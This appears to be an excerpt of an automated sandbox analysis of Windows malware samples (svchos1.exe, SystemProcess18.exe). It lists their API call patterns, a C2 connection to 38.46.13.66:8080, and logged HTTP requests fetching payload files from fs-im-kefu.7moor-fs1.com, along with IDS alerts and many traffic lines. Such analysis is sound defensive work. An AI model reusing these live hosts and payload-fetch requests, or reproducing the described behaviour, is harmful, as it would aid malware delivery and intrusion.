          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035EB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,28_2_035EB250
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C92B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,28_2_035C92B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C9090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,28_2_035C9090
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C97D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,28_2_035C97D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C9B60 FindFirstFileA,FindClose,FindClose,28_2_035C9B60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CBD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,28_2_035CBD60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C9C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,28_2_035C9C40
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,29_2_006E6AD8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_010529AD FindFirstFileExW,29_2_010529AD
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030AB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,29_2_030AB250
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030892B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,29_2_030892B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03089090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,29_2_03089090
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030897D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,29_2_030897D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03089B60 FindFirstFileA,FindClose,FindClose,29_2_03089B60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0308BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,29_2_0308BD60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03089C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,29_2_03089C40
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C8E60 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlen,lstrlen,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,28_2_035C8E60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then push esi28_2_03498938
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then sub esp, 0000009Ch28_2_0348F35C
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]28_2_034AF0F4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then push ebp28_2_0349561D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then push esi28_2_0349581E
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]28_2_035EE770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then sub esp, 0000009Ch29_2_0298F35C
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]29_2_029AF0F4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then push ebp29_2_0299561D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then push esi29_2_0299581E
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then push esi29_2_02998938
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]29_2_030AE770
          Source: global trafficTCP traffic: 192.168.2.6:49700 -> 38.46.13.66:8080
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49693 -> 113.142.77.41:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035ED3C0 _snprintf,recv,CreateThread,CloseHandle,recv,CreateThread,CloseHandle,Sleep,closesocket,28_2_035ED3C0
          Source: global trafficHTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741854013752/4.txt HTTP/1.1Connection: Keep-AliveUser-Agent: MyApp/1.0Host: fs-im-kefu.7moor-fs1.com
          Source: global trafficHTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: fs-im-kefu.7moor-fs1.com
          Source: global trafficDNS traffic detected: DNS query: xiaobaituzi.com
          Source: powershell.exe, 00000010.00000002.1341669860.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1377034169.0000000007811000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1430682426.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 0000000A.00000002.1343846433.000000000572A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1353874119.00000000060DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000015.00000002.1414449184.0000000005275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000A.00000002.1339125174.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.00000000047B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1414449184.000000000531F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 0000000A.00000002.1339125174.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.0000000005071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.1339125174.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.00000000047B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1414449184.000000000531F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000015.00000002.1414449184.0000000005275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000A.00000002.1339125174.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1343464862.0000000005071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1398898419.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: SystemProcess18.exe, 00000003.00000003.1596189606.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1603400037.0000000000926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/
          Source: SystemProcess18.exe, 00000003.00000003.1596189606.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1603400037.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/1
          Source: svchos1.exeString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
          Source: SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1603400037.0000000000926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt5
          Source: SystemProcess18.exe, 00000003.00000003.1490622674.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1480600761.0000000000968000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1644579055.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1641747001.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1706790324.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1474393407.0000000000967000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1484007429.0000000000968000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1634190657.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1497498025.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1787014067.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1637641124.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1706790324.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.0000000000926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt
          Source: powershell.exe, 00000015.00000002.1414449184.0000000005275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000A.00000002.1343846433.000000000572A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1353874119.00000000060DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: svchos1.exeString found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 50417 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
          Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 50347 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 50335 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
